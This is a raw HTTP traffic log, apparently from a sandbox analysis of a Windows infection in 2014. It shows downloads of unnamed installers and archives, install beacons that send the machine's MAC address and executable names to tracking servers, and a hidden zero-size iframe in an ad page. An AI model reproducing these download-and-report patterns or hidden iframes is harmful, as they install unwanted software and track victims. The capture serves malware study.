Host: s.sogv.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:18:30 GMT
Content-Length: 54492
Content-Type: application/octet-stream
Content-Location: hXXp://s.sogv.com/ext/ext.7z
Last-Modified: Sun, 20 Jul 2014 14:08:34 GMT
Accept-Ranges: bytes
ETag: "861c1f1824a4cf1:195f"
Server: NGINX/0.6.39
X-Powered-By: WAF/2.0
7z..'...............$.........4\.~..\].=.=A......$...~.%.....s...f.^Rj
c1..~-.......`.~..`..YVJZ1..E.........#.]33[.R.CW? R:.fh;Da.M..._<.
........2.9.u.fzP....x.....q%...}./..(..1....Q.qm......9.L.q..h..z....
.,...Y..6.....$bR.....k........6...A)....`.^.M........d.mv.u.V.nW..i.n
....=.a.G...T,~T....7.........8.M'.j@...\*...t.)].i..Q.m.S...d...t]M.F
[email protected].../LR.;...0......s..w1.v.5.$...E..`A&
lt;zL....J.J.A....G~......T.i"j.....XZ..k.....a....&B.HI......}k.*w...
.V..iti.....K...W....D(0.h.'..>h.5........k04.v/h...s_V}.?P ......9
j!*.O.}.Kc.;`.....D..y}..=.....=R..G..........F............&.TZ.....w.
...h....h..{.G....P:.l$...r..G.6...'..F.z...x..Lo9a.#....[...K.F......
....V...............}.wi..........5Y....b..Q.....^.c.e..x..V&Rh.ZW.<
;..f.h5....ECpS..N.o....5A".......%.sM...n..vy"a..I.._.\x.V)S.ZB.x.A,\
..i.$ ....U....w.D...pF..F.WV....h..#-.....P5.v'M\.....{}..#...2...'..
^...7..s^..L..%..0.....<jJ....T_.o.F.....veX.D..v..U......w...E]5y%
.d.6...ex=..1"..I..n...b...w3Q........cr..6.zyd................./| ...
.]bg... ..b.=..vm......i~D6....m;A.........(W..4k).^.......UpV.h.....Y
[email protected]..{.!U.{#.y|..=.>eu..751.Sl.D...M.9#....cJK..
....j.......J/...b|.YW...Y.T.r......Z..v*s.....d......z|...`.......L4.
8....:S.........f....hp......\7.w..?....g?......z.y<.{6.!eUV..?....
..[$..<./........./.t..f..7.[......i\.*8|_..2.....I...'x>..;M1.|
.K..-B...g#.3.IY.J...E--5Zk.l.-K..o...C.9^;..v$G.%%.*d.........!../E&g
t;..]....'/.......Fi.....C(<..h:.M...4bN...Zx....F..Z.......?L.
<<< skipped >>>


GET /fwtj.ashx?v=1.14.820.1 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: updatetest.wuji.com
Pragma: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Thu, 18 Sep 2014 00:17:58 GMT
Content-Type: text/html
Connection: close
0A0..



GET /stj.ashx?v=1.14.820.1&t=41 HTTP/1.1
Host: updatetest.wuji.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Thu, 18 Sep 2014 00:17:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
3..0A0..0..HTTP/1.1 200 OK..Server: nginx/1.6.1..Date: Thu, 18 Sep 201
4 00:17:55 GMT..Content-Type: text/html..Transfer-Encoding: chunked..C
onnection: keep-alive..3..0A0..0..



GET /tc.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc1.haoda123.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:33 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">..  BODY { f
ont: 9pt/12pt .... }..  H1 { font: 12pt/15pt .... }..  H2 { font: 9pt/
12pt .... }..  A:link { color: red }..  A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;....................................................<hr>..<
p>................</p>..<ul>..<li>...............
.........................................</li>..<li>......
......................................................................
......</li>..<li>....<a href="javascript:history.back(1
)">....</a>....................</li>..</ul>..<
h2>HTTP .... 404 - ..................<br>Internet ........ (I
IS)</h2>..<hr>..<p>..............................<
;/p>..<ul>..<li>.... <a href="hXXp://go.microsoft.co
m/fwlink/?linkid=8180">Microsoft ............</a>..........&l
dquo;HTTP”..“404”........</li>..<li>....
“IIS ....”...... IIS ...... (inetmgr) ....................
....“........”..“............”..“.......
...........”........</li>..</ul>..</TD><
<<< skipped >>>


GET /stat.php?id=4327411&web_id=4327411&show=pic HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s85.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Thu, 18 Sep 2014 00:16:56 GMT
Expires: Thu, 18 Sep 2014 01:46:56 GMT
1f7a..(function(){function l(){this.c="4327411";this.O="z";this.K="pic
";this.H="";this.J="";this.o="1410999416";this.M="hzs2.cnzz.com";this.
I="";this.q="CNZZDATA" this.c;this.p="_CNZZDbridge_" this.c;this.C="_c
nzz_CV" this.c;this.s="0";this.v={};this.a={};this.ia()}function g(a,c
){try{var b=[];b.push("siteid=4327411");.b.push("name=" f(a.name));b.p
ush("msg=" f(a.message));b.push("r=" f(h.referrer));b.push("page=" f(d
.location.href));b.push("agent=" f(d.navigator.userAgent));b.push("ex=
" f(c));b.push("rnd=" Math.floor(2147483648*Math.random()));(new Image
).src="hXXp://jserr.cnzz.com/log.php?" b.join("&")}catch(e){}}var h=do
cument,d=window,f=encodeURIComponent,k=decodeURIComponent,p=unescape,q
=escape;l.prototype={ia:function(){try{this.R(),this.G(),this.fa(),thi
s.D(),this.l(),this.da(),this.ca(),this.ga(),this.i(),.this.ba(),this.
ea(),this.ha(),this.$(),this.Y(),this.aa(),this.na(),d[this.p]=d[this.
p]||{},this.Z("_cnzz_CV")}catch(a){g(a,"i failed")}},la:function(){try
{var a=this;d._czc={push:function(){return a.w.apply(a,arguments)}}}ca
tch(c){g(c,"oP failed")}},Y:function(){try{var a=d._czc;if("[object Ar
ray]"==={}.toString.call(a))for(var c=0;c<a.length;c  ){var b=a[c];
switch(b[0]){case "_setAccount":d._cz_account="[object String]"==={}.t
oString.call(b[1])?b[1]:String(b[1]);break;case "_setAutoPageview":"bo
olean"===.typeof b[1]&&(d._cz_autoPageview=b[1])}}}catch(e){g(e,"cS fa
iled")}},na:function(){try{if("undefined"===typeof d._cz_account||d._c
z_account===this.c){d._cz_account=this.c;if("[object Array]"==={}.
<<< skipped >>>


GET /280cf9c20714744ccd17e57f66106dc70000000000370d38/9291/15474/setup_2949-14598.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 175.6.4.178


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 18 Sep 2014 00:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 3607864
Last-Modified: Mon, 22 Jul 2013 07:13:16 GMT
Connection: keep-alive
ETag: "51ecdb8c-370d38"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A...........
......;.....j.=.....j...u...j... ..... .......0.............j.......j.
9.....j.>.....Rich............................PE..L......Q.........
........6....5..............P....@[email protected]
...@.................................<.............5...........6.8'
....7. [email protected].......
.....................text....5.......6.................. ..`.rdata..tW
...P...X...:..............@[email protected]..........................@...
.rsrc.....5.......5.................@[email protected]..&>[email protected]....
[email protected].........................................................
......................................................................
......................................................................
......................................................................
.....................................................U..j.h.DA.d.....P
...SV.$.A.3.P.E.d......u..50.A.3..]..F<j....rA..F..rA..F..rA..F..rA
..F..sA..F,....f.F0...^4h.sA.P.F8....x...F8.X..E..h.....F|............
.....7s......E..E..;.t.P.......3.S.M.Q.V.R.F4.E......]..]..]...`RA....
M.d......Y^[..].................U..j.hCEA.d.....P..T....$.A.3..E.SVWP.
E.d......................M....E......{1.t.h......<QA..{4.......j.h.
[email protected](........5.QA.j...j.....j.h<sA......QA..M.QP..PRA..
U. U.j.h....h......2j...P......W.......O(Q..0RA..W(j.R...RA..G(jCj
<<< skipped >>>


POST /cstat.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; VVV.eliang.com)
Host: stat.eliang.com
Content-Length: 204
Cache-Control: no-cache

#237348652
PGdgJjw2bB0QdxlpHWYCF1tbP0F3allZIW9gIy9bd2pZXzkmbBhQWjlnZgBkfmIFaAN6an8deWNhGmk/Ii1uHXlhfRxrBGZvZhhhZmYaaD8jM24eeWJ9GHYEempiADQiIUU/RhVvDB1lYmkHP00vUDBFMW9gHWgEc3ZhH2RlaB1vDX9sfx5tYGgdYgd/aWA=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:26 GMT
Content-Type: text/html
Content-Length: 1
Connection: keep-alive
0..



GET /9.gif?abc=1&rnd=879903237 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 18 Sep 2014 00:16:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=ehKhDDcf y8CAcGK9OfwIiB ; expires=Sun, 15-Sep-24 00:16:58 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=55f33414; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=6af4cab89912e5d826d1b53a_1410999418; expires=Sun, 15-Sep-24 00:16:58 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB 
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
 Tengine..Date: Thu, 18 Sep 2014 00:16:58 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=ehKhDDcf y
8CAcGK9OfwIiB ; expires=Sun, 15-Sep-24 00:16:58 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=55f33414; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=6af4cab89912e5d826d1b53a_1410999418; expires=Sun, 
15-Sep-24 00:16:58 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=ehKhDDcf y8CAcGK9OfwIiB ..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;..



POST /report/install HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Content-Length: 95
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded

data=pid=juese.exe.sn=a-zm-157391-v5.exe.mac=000c298a8b37.sign=caffe9902757bc952e61973b93c16d40
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
ok..



GET /appupdate/ver.txt HTTP/1.1
Host: update.yinyue.fm
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 18 Jun 2013 05:57:08 GMT
Accept-Ranges: bytes
ETag: "32a6e0aae86bce1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:05 GMT
Content-Length: 36
[appver]..ver=1.0..ver2=20130606..HTTP/1.1 200 OK..Content-Type: text/
plain..Last-Modified: Tue, 18 Jun 2013 05:57:08 GMT..Accept-Ranges: by
tes..ETag: "32a6e0aae86bce1:0"..Server: Microsoft-IIS/7.5..X-Powered-B
y: ASP.NET..Date: Thu, 18 Sep 2014 00:18:05 GMT..Content-Length: 36..[
appver]..ver=1.0..ver2=20130606..



GET /kbtongji.asp?sn=sjss_jing_zhimeng_217.exe&tmac=8a0c008b3729&action=kb&ver=0.4 HTTP/1.1
User-Agent: LETITGO
Host: updateinfo.yyhsj.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:54 GMT
Server: Microsoft-IIS/6.0
Content-Length: 2
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQDSSCRR=MEDDEKNAAHFBPBIPAFDAHEDO; path=/
Cache-control: private
OKHTTP/1.1 200 OK..Date: Thu, 18 Sep 2014 00:17:54 GMT..Server: Micros
oft-IIS/6.0..Content-Length: 2..Content-Type: text/html..Set-Cookie: A
SPSESSIONIDQQDSSCRR=MEDDEKNAAHFBPBIPAFDAHEDO; path=/..Cache-control: p
rivate..OK..



GET /a.ashx?v=51856086832E9ADB347D74A1629E1CFEB5DC550C165417452F22832D24A951CAAFFC03962B62E52CCBF64CA69B5AF643186FDCD5FBEAC2F2F99B14F7904EE489ACB7D5F447E350A705904461522CDC97865D9D861FB35CB7248760DE2BB230184CB1882A5F42401CB6EB7ECD8659BA964F712249A8AFF852125B284DE3F595E4604E0B1FF6D36DC4 HTTP/1.1
Host: tongji.yinyue.fm
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:15:41 GMT
Content-Length: 3
100HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html; c
harset=utf-8..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..
X-Powered-By: ASP.NET..Date: Thu, 18 Sep 2014 00:15:41 GMT..Content-Le
ngth: 3..100..



GET /tqrl_89_177560.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.tianyunxj.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:30 GMT
Content-Length: 3098224
Content-Type: application/octet-stream
Last-Modified: Sat, 13 Sep 2014 01:10:57 GMT
Connection: Keep-Alive
ETag: "6c7c992efcecf1:1819"
Content-Location: hXXp://down.tianyunxj.com/setup.exe?404;hXXp://down.tianyunxj.com:80/tqrl_89_177560.exe
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: MISS from cnc-sd-153-130.fcd, DISK HIT from ctl-gx-254-147.fcd
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......B.e|.../.../
.../.../.../..T/.../..V/.../.../.../R.;/.../e.!/.../.../.../..Q/.../Ri
ch.../........................PE..L......N.................t..........
.>[email protected]................
..................................k.......... )/.P....................
......................................................................
..text....s.......t.................. ..`.rdata..Z............x.......
.......@[email protected][email protected]...`...`.....
......................rsrc....k.......l..................@..@.........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
....._B..H.P.u..u..u...\[email protected]._B..E.WP.u...`[email protected]...
d.@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...h.@
..u....E..9}[email protected].}[email protected]
[email protected][email protected] [email protected].@._
^3.[.....L$..(_B...Si.....VW.T.....tO.q.3.;5,_B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5,_B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /dc/setup/install/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/?result=succ HTTP/1.1
Host: appledesktop.sinaapp.com
Connection: Keep-Alive


HTTP/1.1 204 NO CONTENT
Server: nginx/1.4.4
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
via: yq26.pyruntime
Set-Cookie: saeut=CkMPGlQaJJckXHMaBsTpAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
HTTP/1.1 204 NO CONTENT..Server: nginx/1.4.4..Date: Thu, 18 Sep 2014 0
0:17:27 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 0
..Connection: keep-alive..via: yq26.pyruntime..Set-Cookie: saeut=CkMPG
lQaJJckXHMaBsTpAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/..



GET /foxd/gz?file=SohuNewPlayer.exe&new=/212/10/LX1gaYhp2TxOw4UbWrnLg7.exe HTTP/1.1
Accept: */*
Host: data.vod.itc.cn
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Thu, 18 Sep 2014 00:17:11 GMT
Content-Length: 0
Connection: close
X-CDN-Type: 0
Location: hXXp://58.216.27.32/sohu/s26h23eab6/ifox/TGogo6wdTGwyTAuHoaX1aa1yov-UE3tAkah9tliosGtNs91v/SohuNewPlayer.exe



GET /ad/softad/popup.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: adsvc2.9365.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 627
Content-Type: text/html
Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT
Accept-Ranges: bytes
ETag: "147dba782ebccd1:1cc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>........</title>..<script type="text/javascript" src="ht
tp://cbjs.baidu.com/js/s.js"></script>..</head>..<bo
dy>..<iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="
no" frameborder="0" height="0" width="0" allowtransparency="true"  bor
der="0" style="width:100%"></iframe>..<script type="text/j
avascript">BAIDU_CLB_singleFillSlot("98364");</script>..</
body>..</html>HTTP/1.1 200 OK..Content-Length: 627..Content-T
ype: text/html..Last-Modified: Tue, 06 Nov 2012 14:53:24 GMT..Accept-R
anges: bytes..ETag: "147dba782ebccd1:1cc1"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Date: Thu, 18 Sep 2014 00:14:29 GMT..<!DOCT
YPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w
3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http
://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Cont
ent-Type" content="text/html; charset=gb2312" />..<title>....
....</title>..<script type="text/javascript" src="hXXp://cbjs
.baidu.com/js/s.js"></script>..</head>..<body>..&
lt;iframe src="hXXp://adsvc1.haoda123.com/tc.htm" scrolling="no" frame
border="0" height="0" width="0" allowtransparency="true"  border="
<<< skipped >>>


GET /9291/25605/sjss_jing_zhimeng_217.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.grandcloud.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.7.2
Date: Thu, 18 Sep 2014 00:17:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101
Connection: keep-alive
Location: hXXp://183.61.184.37/02aab2d719917873b95f7e285991ad620000000000082370/9291/25605/sjss_jing_zhimeng_217.exe
<html><head><title>Moved Temporarily</title>&l
t;/head><body><h1>302 Moved Temporarily</h1></
body></html>HTTP/1.1 302 Moved Temporarily..Server: nginx/1.7
.2..Date: Thu, 18 Sep 2014 00:17:05 GMT..Content-Type: text/html; char
set=utf-8..Content-Length: 101..Connection: keep-alive..Location: http
://183.61.184.37/02aab2d719917873b95f7e285991ad620000000000082370/9291
/25605/sjss_jing_zhimeng_217.exe..<html><head><title>
;Moved Temporarily</title></head><body><h1>302
 Moved Temporarily</h1></body></html>..



GET /htop/htop_x.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 20140918081631105.wangendong.com


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 01 Aug 2014 07:30:54 GMT
Accept-Ranges: bytes
ETag: "22e676875aadcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:17:19 GMT
Content-Length: 2017736
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\..........!1.......p....@.........................
........>........................................s....... ...m.....
.....H................................................................
p...............................text...8Z.......\.................. ..
`.rdata.......p.......`..............@[email protected].......
[email protected][email protected]... ...n.
..v..............@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
....h>[email protected]>[email protected].
P.u...Pr@..}..e..9}[email protected]........ M............U....M....
3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.
[email protected]@..u....E..9}[email protected].
}[email protected]@[email protected] ...Pj.h`6B.W..X
[email protected]...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q
.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...
<<< skipped >>>


GET /tjapis.php?mac=000C298A8B37&st=1&exez=tqrl_89_177560.exe&exef=axuls.exe&pass=7a41a5df85b86824a6d2d5418a8cd43e&url1=hXXp://ya.ru/&url2=ya HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: union.yoyolm.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.3.24
Set-Cookie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-type: text/html
Content-Length: 91
...193.138.244.23125..<meta http-equiv="Content-Type" content="text
/html; charset=utf-8">..HTTP/1.1 200 OK..Date: Thu, 18 Sep 2014 00:
17:58 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: PHP/5.3.24..Set-Co
okie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT..Content-
type: text/html..Content-Length: 91.....193.138.244.23125..<meta ht
tp-equiv="Content-Type" content="text/html; charset=utf-8">....



GET /Update.rar HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.yinyue.fm
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 04 Sep 2014 05:13:26 GMT
Accept-Ranges: bytes
ETag: "53e0e0f4fec7cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:09 GMT
Connection: keep-alive
Content-Length: 5771
.....................khkh...4;*2*2)/.$..1.-<..)..*2*2)/.&.9. ...)..
............................khkh.1#...=Á.(1..5..*.P.................
.........................................khkh..',; V E.$..1.-<..)..
.A4;.',; V E.$..1.-<..)...A.D'O.:..5..*.P..A.D'O.:.A.D...6.\,O..A.D
'O.:...6.\,O.khkh........................................khkh.'-&".E0.
.*2. .9.'-&".E0.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~.*2. .9~.....~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~....
..........khkh.*J,"$V-Q..'-.J*J,"~- 4.$V-Q..Q48*J$V2.....$V-Q2......3$
V4(...............>.6.*J,"$V-Q(./G(0..Q48*J$V..5U(0.*J$V ...5U(0.!2
"A*J$V ...(.(.$V-Q5(/....3$V4(...>.6.kh.$V-Q.5.M.*J$V .'[.."..G..3$
V4(........#-.5(/.....................................................
.......khkh.................Q48$V-Q..5.5..A18.Q48(.1!."*J$V2......3$V4
(.....D...=.................khkh.......0D%Q. .$..1.-<..)...........
.....................................................khkh...'.&./. V E
.$..1.-<..)..!.#.1...5..Z................................khkh......
......................................................................
......................................................................
.............khkh.....................................................
......................................................................
.............)7.)5.!D..5..*.P.khkh.....................)7.)5.!D..4X.*.
P........~........~.......~..........~..............;&)~..~)7.)...4.*.
P. ....5.."...!Y.$.khkhkh.&3.X.K..5..*.P..........................
<<< skipped >>>


GET /link/140896/setup_2948-140896.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: click.t3nlink.com
Connection: Keep-Alive


HTTP/1.1 302 FOUND
Server: nginx/1.0.10
Date: Thu, 18 Sep 2014 00:17:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 303
Location: hXXp://down.yinyue.fm/open/setup_2948-140896.exe
Set-Cookie: gid=4cac5beee6a24f658b915b61dcaaab10; Domain=.jxvector.com; expires=Wed, 13-Sep-2034 08:17:10 GMT; Max-Age=630720000; Path=/
Cache-Control: no-cache
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
CWaueeKey: 1410999430
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<titl
e>Redirecting...</title>.<h1>Redirecting...</h1>.
<p>You should be redirected automatically to target URL: <a h
ref="hXXp://down.yinyue.fm/open/setup_2948-140896.exe">hXXp://down.
yinyue.fm/open/setup_2948-140896.exe</a>.  If not click the link
.HTTP/1.1 302 FOUND..Server: nginx/1.0.10..Date: Thu, 18 Sep 2014 00:1
7:10 GMT..Content-Type: text/html; charset=utf-8..Connection: keep-ali
ve..Content-Length: 303..Location: hXXp://down.yinyue.fm/open/setup_29
48-140896.exe..Set-Cookie: gid=4cac5beee6a24f658b915b61dcaaab10; Domai
n=.jxvector.com; expires=Wed, 13-Sep-2034 08:17:10 GMT; Max-Age=630720
000; Path=/..Cache-Control: no-cache..P3P: CP="UNI CUR OUR", policyref
="/w3c/p3p.xml"..CWaueeKey: 1410999430..<!DOCTYPE HTML PUBLIC "-//W
3C//DTD HTML 3.2 Final//EN">.<title>Redirecting...</title&
gt;.<h1>Redirecting...</h1>.<p>You should be redirec
ted automatically to target URL: <a href="hXXp://down.yinyue.fm/ope
n/setup_2948-140896.exe">hXXp://down.yinyue.fm/open/setup_2948-1408
96.exe</a>.  If not click the link...
<<< skipped >>>


GET /ico.ico HTTP/1.0
Host: VVV.meimotuan.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:57 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 18 Jun 2014 06:03:51 GMT
ETag: "e8901-25be-4fc16063d5483"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: image/vnd.microsoft.icon
......00.... ..%......(...0...`..... ......$...................}...}..
.}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...|...~
